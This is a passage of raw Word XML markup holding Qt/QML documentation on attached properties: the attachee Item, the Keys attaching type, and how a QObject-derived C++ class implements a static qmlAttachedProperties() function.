          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object to enable it to access and set these attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId246" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object is the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attachee</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, to which the instance of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached object</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has been attached.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId247" w:history="1">
        <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Keys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="0089092D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which provides the</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attachee</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with a named qualifier, "Keys", through which it may access the attributes of the</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached object type</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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89092D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When the QML engine </w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>processes this code, it creates a single instance of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and attaches this instance to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId248" w:history="1">
        <w:r w:rsidRPr="00653106">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, thereby providing it with access to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enabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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returnPressed</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attributes of the instance.</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The mechanisms for providing attached objects </w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be implemented from C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by providing classes for the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For the</w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, provide a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId249" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived class that defines the attributes to be made accessible to</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attachee</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">objects. </w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For the</w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, provide a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId250" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived class that:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">implements a static </w:t>
      </w:r>
      <w:r w:rsidRPr="00082341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmlAttachedProperties</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() with the following signature:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>static</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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AttachedPropertiesType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
